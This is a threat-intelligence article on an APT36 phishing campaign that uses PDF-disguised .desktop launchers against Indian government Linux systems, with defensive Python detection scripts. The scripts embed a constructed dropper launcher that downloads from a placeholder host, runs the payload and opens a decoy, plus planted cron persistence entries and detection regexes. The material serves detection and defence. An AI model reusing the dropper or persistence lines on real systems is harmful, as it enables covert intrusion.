Transparent Tribe, also tracked as APT36 and believed to operate out of Pakistan, has been observed in a new campaign against Indian government systems. According to reports from CYFIRMA and CloudSEK, the group is targeting both Windows and BOSS Linux (Bharat Operating System Solutions, the Debian-based distribution developed by India's C-DAC for government use) with spear-phishing emails that deliver weaponized desktop shortcut (.desktop) files. The dual-platform lure shows the group tailoring its delivery mechanism to whatever desktop the target actually runs rather than assuming Windows.

Source: bosslinux.in.
The attack chain typically starts with a phishing email disguised as a meeting notice. The attachment is presented as a PDF but is actually a Linux .desktop launcher, for example "Meeting_Ltr_ID1543ops.pdf.desktop": desktop environments that display a launcher's Name= value instead of its filename hide the trailing .desktop extension entirely, so the file looks like an ordinary document. When the victim opens it, the launcher's Exec= line runs a shell command that downloads and executes the payload. To avoid raising suspicion, the command opens a decoy PDF hosted on Google Drive in Firefox while quietly saving a Go-compiled ELF binary fetched from attacker infrastructure to disk and executing it.
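The masquerading pattern described above can be triaged mechanically. The Python script below is an added example, not code from the CYFIRMA or CloudSEK reports: it parses a .desktop launcher with the standard library's INI parser, checks the filename for a document-looking double extension, and inspects the Exec= line for a shell spawned with -c, a downloader, a chmod +x or nohup on a dropped file, and a remote document opened as a decoy. The launcher embedded in it is constructed to mirror the behaviour the article describes, with example.invalid placeholders in place of the real attacker URLs; the indicator regexes and tag names are my own assumptions about what such droppers contain.

```python
"""Added example: triage .desktop launchers for the document-masquerade dropper pattern.
The sample launcher below is constructed, not the campaign's file; URLs are placeholders."""
import configparser
import re
from pathlib import PurePosixPath

# Indicator patterns for the Exec= line (assumed heuristics, not strings from the real sample).
SHELL_RE = re.compile(r"\b(?:bash|sh|zsh|dash)\s+-c\b")
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b")
DROP_RUN_RE = re.compile(r"\bchmod\s+\+x\b|\bnohup\b")
DECOY_RE = re.compile(r"\b(?:xdg-open|firefox|evince)\b[^;&|]*https?://")
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}


def parse_desktop(text):
    """Parse a freedesktop .desktop file (INI syntax) into its [Desktop Entry] keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # .desktop keys are case-sensitive; keep Exec/Name as written
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def triage(filename, text):
    """Return the indicator tags that fire for a launcher; an empty list means nothing odd."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    tags = []
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if len(suffixes) >= 2 and suffixes[-1] == ".desktop" and suffixes[-2] in DOCUMENT_EXTS:
        tags.append("double_extension")   # e.g. report.pdf.desktop
    if SHELL_RE.search(exec_line):
        tags.append("shell_exec")         # Exec=bash -c "..."
    if DOWNLOAD_RE.search(exec_line):
        tags.append("downloader")         # curl/wget inside the command
    if DROP_RUN_RE.search(exec_line):
        tags.append("drop_and_run")       # chmod +x or nohup on the dropped file
    if DECOY_RE.search(exec_line):
        tags.append("remote_decoy")       # opens a hosted document to look legitimate
    if "shell_exec" in tags and entry.get("Terminal", "").lower() == "false":
        tags.append("hidden_shell")       # the shell runs with no visible terminal
    return tags


# Constructed sample mirroring the reported chain: decoy opened in Firefox, payload fetched
# to a hidden path in /tmp, made executable and detached. Domains are placeholders.
SAMPLE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
SAMPLE_LAUNCHER = """\
[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "firefox https://example.invalid/decoy.pdf & curl -fsSL https://example.invalid/p -o /tmp/.p && chmod +x /tmp/.p && nohup /tmp/.p >/dev/null 2>&1 &"
"""

# Constructed benign launcher for comparison.
BENIGN_NAME = "firefox.desktop"
BENIGN_LAUNCHER = """\
[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Terminal=false
"""

if __name__ == "__main__":
    for name, text in ((SAMPLE_NAME, SAMPLE_LAUNCHER), (BENIGN_NAME, BENIGN_LAUNCHER)):
        print(f"{name}: {', '.join(triage(name, text)) or 'clean'}")
```

In practice the script would be pointed at files arriving via mail gateways or sitting in users' Downloads and Desktop directories; a single tag is only a hint, but a document-named launcher whose Exec= line both downloads and executes something is worth quarantining on sight.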
The binary beacons to a command-and-control server at modgovindia[.]space on port 4000, from which it fetches additional payloads and receives operator commands, and to which it exfiltrates sensitive data. Persistence is maintained through cron jobs that relaunch the malware after a reboot. Further analysis shows the campaign deploying Poseidon, a Transparent Tribe backdoor capable of reconnaissance, credential harvesting, and lateral movement. The binary also contains anti-debugging and sandbox-detection routines, but these are described as dummy checks: placeholder evasion code rather than functional protection against analysis tools.
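The cron persistence described above leaves a record in the affected user's crontab. The Python audit below is an added example, not tooling from the reports: it parses crontab text (assumed to be supplied as the output of `crontab -l` for each user) and flags jobs that run at boot or every few minutes, launch binaries from world-writable or hidden home-directory paths, detach silently, or call a downloader. The crontab it runs on is constructed, and the heuristics are my own assumptions about what planted entries look like.

```python
"""Added example: audit user crontab text for relaunch-after-reboot persistence of the kind
the article describes. The crontab below is constructed, not captured from a victim."""
import re

CRON_FIELDS = 5
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_HOME_RE = re.compile(r"(?:^|\s)(?:/home/[^/\s]+|/root|~|\$HOME)/\.[^\s/]+")
DETACHED_RE = re.compile(r"\bnohup\b|>\s*/dev/null\s+2>&1")
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")


def parse_crontab(text):
    """Yield (schedule, command) for each active job; skips comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                        # PATH=..., MAILTO=...
            continue
        if first.startswith("@"):               # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, CRON_FIELDS)
            if len(parts) <= CRON_FIELDS:
                continue                        # malformed: five time fields but no command
            sched, cmd = " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]
        yield sched, cmd.strip()


def flag_job(sched, cmd):
    """Return the reasons a job looks like planted persistence (empty list = nothing odd)."""
    reasons = []
    if sched == "@reboot":
        reasons.append("runs_at_boot")          # relaunch after reboot, as the article describes
    elif sched.startswith(("* ", "*/")):
        reasons.append("high_frequency")        # every minute or every N minutes: watchdog pattern
    if any(d in cmd for d in WORLD_WRITABLE_DIRS):
        reasons.append("world_writable_dir")    # payload staged in /tmp, /var/tmp or /dev/shm
    if HIDDEN_HOME_RE.search(cmd):
        reasons.append("hidden_home_path")      # binary under a dot-directory in a home dir
    if DETACHED_RE.search(cmd):
        reasons.append("detached_silent")       # nohup, or all output discarded
    if DOWNLOADER_RE.search(cmd):
        reasons.append("downloader")            # re-fetches a stage from the network
    return reasons


def audit_crontab(text):
    """Return [(schedule, command, reasons)] for every flagged job, in file order."""
    flagged = []
    for sched, cmd in parse_crontab(text):
        reasons = flag_job(sched, cmd)
        if reasons:
            flagged.append((sched, cmd, reasons))
    return flagged


# Constructed crontab: one legitimate backup job and two planted jobs.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
MAILTO=""
# nightly backup (legitimate)
0 2 * * * /usr/bin/rsync -a /home/user/docs /mnt/backup
@reboot /home/user/.config/.cache/update >/dev/null 2>&1 &
*/5 * * * * nohup /tmp/.p >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for sched, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{sched:<12} {cmd}\n    -> {', '.join(reasons)}")
```

The same checks apply to /etc/crontab and /etc/cron.d entries (which carry an extra user field after the schedule) and to systemd user units, which are the other common place Linux malware plants a relaunch; a baseline of known-good jobs per host keeps the legitimate backup-style entries from generating noise.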
These latest operations come shortly after Transparent Tribe was caught targeting Indian defense institutions with spoofed domains designed to phish credentials and two-factor authentication (2FA) codes. Notably, the group has been actively targeting Kavach, the 2FA solution used by Indian government agencies, since at least 2022—further underscoring its persistence and focus on maintaining long-term access to sensitive networks.
For healthcare and medical security professionals, this campaign underscores the importance of defending against phishing that adapts its payload to the target's platform. Like government institutions, healthcare organizations run heterogeneous environments, with Windows workstations alongside Linux systems, which makes them attractive to attackers able to tailor delivery across both. To reduce exposure, security teams should treat .desktop and other launcher files arriving by email or download as executables in their filtering and endpoint policies, educate staff about double-extension masquerading (a name such as report.pdf.desktop), and deploy endpoint monitoring capable of spotting persistence mechanisms such as newly added cron jobs and unexpected binaries executed from temporary or hidden directories. Multi-factor authentication should rely on phishing-resistant methods such as FIDO2 security keys rather than one-time codes, which, as the Kavach-focused phishing shows, can be captured and replayed; stolen passwords alone then do not grant access.